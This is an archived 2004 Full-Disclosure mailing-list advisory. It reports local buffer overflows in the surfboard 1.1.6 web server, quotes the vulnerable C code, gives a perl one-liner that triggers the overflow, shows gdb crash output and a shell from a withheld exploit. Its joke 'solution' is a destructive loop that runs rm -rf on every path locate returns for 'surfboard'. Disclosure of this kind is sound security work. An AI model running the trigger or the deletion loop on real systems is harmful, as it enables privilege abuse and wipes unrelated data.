lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 11 May 2004 22:19:01 +0200 (CEST)
From: Anonymous <nobody@...anoici.org>
To: full-disclosure@...ts.netsys.com
Cc: bugtraq@...urityfocus.com
Subject: surfboard1.1.6 local exploit.


Nothing Special, just a local overflow issue:

Fluffy, the black security kat presents:
Surfboard httpd local overflows

Problem Description:

Due to lazy programmer, fluffy can exploit several flaws in surfboard httpd to gain new shell, yippee.

Technical Details:
                                                                                                     
                                                                                                     
from surfboard.c line 31:
--------------------------------------------------------
/* This can be overridden from the command line */
char conffile[1024] = "/etc/surfboard/surfboard.conf";
                                                                                 
/* All of these can be overridden from the config file */
char docroot[1024] = "/pub";
char logfile[1024] = "/var/log/surfboard/httpd.log";
char mimefile[1024] = "/etc/surfboard/mime.conf";
char mime_default[512] = "text/plain";
char dirindex[1024] = "index.html";
                                                                                                     
--------------------------------------------------------
                                                                                                     
                                                                                                     
from surfboard.c line 66 :
--------------------------------------------------------
main(int argc, char * argv[])
{
  int s, a;
                                                                                 
  if(argc>1) { strcpy(conffile, argv[1]); }  [1]
                                                                                 
  readconf();      [2]
                                                                                 
  log_msg(LOG_MSG, "Surfboard started");
                                                                                 
  if((s=setupsock())<0)
  {
    log_msg(LOG_ERR, "Could not open socket");
    perror("Could not open socket");
--------------------------------------------------------
                                                                                                     
                                                                                                     
[1] Nasty cracker can happily pass a long arguement on cmd line to cause buffer overflow.
    A simple attack: ./surfd /etc/`perl -e 'printf "A"x2212'`
                                                                                                     

[2] readconf routine is buggy and can be overflowed:
                                                                                                     
from surfboard.c line 605:
--------------------------------------------------------
void readconf(void)
{
  FILE * conf;
  char cmd[512];
  char buf[1600];
                                                                                 
  sprintf(buf, "Reading config from file \"%s\"", conffile);
  log_msg(LOG_DEBUG, buf);
                                                                                 
                                                                                 
  if((conf=fopen(conffile, "r"))==NULL)
  {
    sprintf(buf, "Could not open config file \"%s\"", conffile);
    log_msg(LOG_ERR, buf);
    fprintf(stderr, "%s\n", buf);
    exit(1);
  }
  while(1)
  {
    fscanf(conf, " %s ", cmd);
    if(feof(conf)) { break; }
    if(cmd[0]=='#') { while(getc(conf)!='\n'); continue; }
                                                                                 
    if(!strcmp(cmd, "Port"))
    {
     fscanf(conf, " %d", &myport);
      continue;
    }
                                                                                 
    if(!strcmp(cmd, "DocRoot"))
    {
      fscanf(conf, " %s", docroot);
      continue;
    }
                                                                                                     
     ..Same style of code to get our options from config file..
--------------------------------------------------------
                                                                                 
fluffy found that if he built a fake config file, and fired up surfboard with that
config file, overflow will occur:
                                                                                                     
bash-2.05b$ gdb surfd
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(gdb) r /home/deadbeat/surfboard.conf
Starting program: /home/deadbeat/security/research/archive/surfboard/surfd /home/deadbeat/surfboard.conf
Program received signal
SIGSEGV, Segmentation fault.
do_lookup_versioned (undef_name=0x40034fbf "free", hash=448693,
    ref=0x40030a18, result=0xbfffed34, scope=0x300, i=0, version=0x40158020,
    skip=0x0, type_class=1) at do-lookup.h:81
81      do-lookup.h: No such file or directory.
        in do-lookup.h
                                                                                                     
                                                                                                     
Exploits:
                                                                                                     
Fluffy doesn't need to release exploits as anyone reading this should be able to
build a exploit based on information provided by fluffy :)
                                                                                                     
bash-2.05b$ ./surfex
Shellc0de is at: 0xbfffffb4
sh-2.05b$
                                                                                                     
                                                                                                     

Solution:
                                                                                                     
fluffy has written a great cmd line hack to solve the problem:
                                                                                                     
for i in `locate surfboard`; do rm -rf $i ; done
                                                                                                     
Should do the trick ;)
                                                                                                     


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists